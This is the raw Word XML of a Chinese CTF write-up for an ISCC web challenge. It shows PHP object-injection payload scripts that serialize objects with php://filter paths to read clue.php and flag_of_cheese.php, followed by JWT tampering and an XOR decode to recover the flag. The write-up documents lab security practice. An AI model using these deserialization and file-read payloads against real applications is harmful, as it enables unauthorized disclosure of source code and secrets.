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4DFA74">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web+谁动了我的奶酪</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0308C21A">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题思路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D6A8C8">
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开网页发现输入框，猜测是tom，输入后进入新页面</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="4893F7CC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2651125"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="302172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7272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B838">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2653665"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="91332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257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27D5">
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析源码后发现是个PHP对象注入，尝试构造payload读取clue.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB8685C">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exp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191534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 w14:paraId="6ABEA702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&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F19E739">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0FC833FA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class Jerry {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E7EAF20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</w:p>
          <w:p w14:paraId="2D112608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   public $secretHidingSpot;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05ECDEB8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   public $squeak;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B28FC34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   public $shout;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CD4BD3C">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="586C5F84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 w14:paraId="5099380C">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2108102F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class Cheese {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D619D29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   public $flavors;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34D70FAD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   public $color; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39813B43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 w14:paraId="2DCB43E5">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7C17704B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$jerry = new Jerry();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="565F19FA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$jerry-&gt;secretHidingSpot = "php://filter/convert.base64-encode/resource=clue.php";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C0FC598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$cheese = new Cheese();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="178A002B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$cheese-&gt;color = serialize($jerry);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2435423F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3B9809F9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$payload = serialize($cheese);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52C35BF7">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7D2F53C0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echo urlencode($payload);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BACF3C6">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0C439E1B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?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7230494D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="904240"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="947419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908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CABA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2661920"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="134021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193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092D">
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解码后发现下一个提示是 flag_of_cheese.php，继续构造payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B98DF1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto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1770" cy="2417445"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1905"/>
            <wp:docPr id="9429639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63941" name="图片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C9CDD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exp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4218AD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 w14:paraId="202D3AF2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&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="023B280A">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="327BBE1B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class Jerry {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5038EDAC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   public $secretHidingSpot;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3302C47D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   public $squeak;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C38C38F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   public $shout;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78B2F7BF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 w14:paraId="04D76070">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="559B5A84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class Cheese {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43EC4BC6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   public $flavors;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B23D241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   public $color;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0845F3F7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 w14:paraId="7EACF0DE">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4BA15FF2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$jerry = new Jerry();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CC6D68B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$jerry-&gt;secretHidingSpot = "php://filter/convert.base64-encode/resource=flag_of_cheese.php";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63216B49">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="141DB2BA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$cheese = new Cheese();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="525E4FED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$cheese-&gt;color = serialize($jerry);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="072D2672">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6A2893BE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$payload = serialize($cheese);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31B8BFEF">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="17A7FA7C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echo urlencode($payload);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2241258A">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="41786071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?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CEB0ED8">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="575945"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="999131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3169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9CFD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5263515" cy="2647950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7322557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55731" name="图片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37B53">
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再次解码后获得一半的flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AC97AC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto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1770" cy="2369185"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="49099938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99387" name="图片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08D6C">
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>观察到原本网页为Y2hlZXNlT25l.php，解码后为cheeseOne，尝试访问cheeseTwo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F56A25">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2675890"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="216173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7392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8269">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2664460"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="2023557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5708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BE81">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2664460"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="2057299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9936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41A6">
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看源码发现线索，key为Jerry_Loves_Cheese</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE79F4B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5263515" cy="2647950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="161013630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36303" name="图片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E226C">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2667635"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="8302500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5002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3676">
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抓包发现有jwt，尝试修改后再发，获得另一半flag地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBE6EAD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5263515" cy="2607945"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="153581570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15703" name="图片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CE240">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto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63515" cy="2799080"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="103568596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85961" name="图片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CA40F">
      <w:pPr>
        <w:pStyle w:val="17"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问后获得另一半加密后的flag，根据前面提示与0x16异或即得flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69636438">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5263515" cy="2799080"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="150408598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85986" name="图片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086A6">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2651125"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="128679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998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82A4">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即Flag: ISCC{J3rry_g0t_h1s_f@v0r!7e_ch33se}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1D12452"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="41D1245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877"/>
    <w:rsid w:val="001043FF"/>
    <w:rsid w:val="001D2B08"/>
    <w:rsid w:val="001F595E"/>
    <w:rsid w:val="002663E7"/>
    <w:rsid w:val="00390F30"/>
    <w:rsid w:val="003D0756"/>
    <w:rsid w:val="003F6770"/>
    <w:rsid w:val="004349FC"/>
    <w:rsid w:val="00497FB1"/>
    <w:rsid w:val="004C7A13"/>
    <w:rsid w:val="00536CC2"/>
    <w:rsid w:val="005457D8"/>
    <w:rsid w:val="00555ADA"/>
    <w:rsid w:val="005849AA"/>
    <w:rsid w:val="00586F3A"/>
    <w:rsid w:val="005B605D"/>
    <w:rsid w:val="0061096D"/>
    <w:rsid w:val="00636A21"/>
    <w:rsid w:val="006C097D"/>
    <w:rsid w:val="006D7CD7"/>
    <w:rsid w:val="00765353"/>
    <w:rsid w:val="007C11A5"/>
    <w:rsid w:val="0080644C"/>
    <w:rsid w:val="0084766E"/>
    <w:rsid w:val="008717B7"/>
    <w:rsid w:val="00883570"/>
    <w:rsid w:val="008B0607"/>
    <w:rsid w:val="008B58F1"/>
    <w:rsid w:val="008B6971"/>
    <w:rsid w:val="008B7D2B"/>
    <w:rsid w:val="008C510D"/>
    <w:rsid w:val="008F08F6"/>
    <w:rsid w:val="009166C2"/>
    <w:rsid w:val="00976812"/>
    <w:rsid w:val="009937FC"/>
    <w:rsid w:val="009B648C"/>
    <w:rsid w:val="00A00690"/>
    <w:rsid w:val="00A14648"/>
    <w:rsid w:val="00A172E0"/>
    <w:rsid w:val="00AB4C7D"/>
    <w:rsid w:val="00AC50F4"/>
    <w:rsid w:val="00AF064E"/>
    <w:rsid w:val="00B2131B"/>
    <w:rsid w:val="00B475A3"/>
    <w:rsid w:val="00B825D4"/>
    <w:rsid w:val="00BB5292"/>
    <w:rsid w:val="00C346CE"/>
    <w:rsid w:val="00CA5793"/>
    <w:rsid w:val="00CD7DCC"/>
    <w:rsid w:val="00E50877"/>
    <w:rsid w:val="00E70BF9"/>
    <w:rsid w:val="00EA3779"/>
    <w:rsid w:val="21592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40" w:lineRule="exact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line="240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100" w:beforeLines="100" w:after="100" w:afterLines="100" w:line="360" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs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spacing w:line="360" w:lineRule="auto"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="30"/>
      <w:szCs w:val="32"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spacing w:line="360" w:lineRule="auto"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="28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20"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="9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7">
    <w:name w:val="header"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="1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8">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="21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eastAsia="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="9">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="11">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="10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basedOn w:val="1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标题 1 字符"/>
    <w:basedOn w:val="12"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="15">
    <w:name w:val="标题 2 字符"/>
    <w:basedOn w:val="12"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="16">
    <w:name w:val="标题 3 字符"/>
    <w:basedOn w:val="12"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="30"/>
      <w:szCs w:val="32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4 字符"/>
    <w:basedOn w:val="12"/>
    <w:link w:val="5"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="19">
    <w:name w:val="页眉 字符"/>
    <w:basedOn w:val="12"/>
    <w:link w:val="7"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="12"/>
    <w:link w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="21">
    <w:name w:val="HTML 预设格式 字符"/>
    <w:basedOn w:val="12"/>
    <w:link w:val="8"/>
    <w:semiHidden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2">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="1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numbering" Target="numbering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49E991-657F-4D14-80E0-94E3ED3458F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264</Words>
  <Characters>1018</Characters>
  <Lines>54</Lines>
  <Paragraphs>9</Paragraphs>
  <TotalTime>87</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1111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2025-05-10T12:45:00Z</dcterms:created>
  <dc:creator>WPS_1664372582</dc:creator>
  <cp:lastModifiedBy>WPS_1664372582</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-16T06:47:15Z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eyJoZGlkIjoiYjVjMTlhODI2OTA4MzI2YTBiZjY2OGM4NDE5NGIyMDgiLCJ1c2VySWQiOiIxNDIwNTAyMzQ2In0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.21171</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>2B7B04FAA63E47AF9FD77418A630624F_12</vt:lpwstr>
  </property>
</Properties>
</file>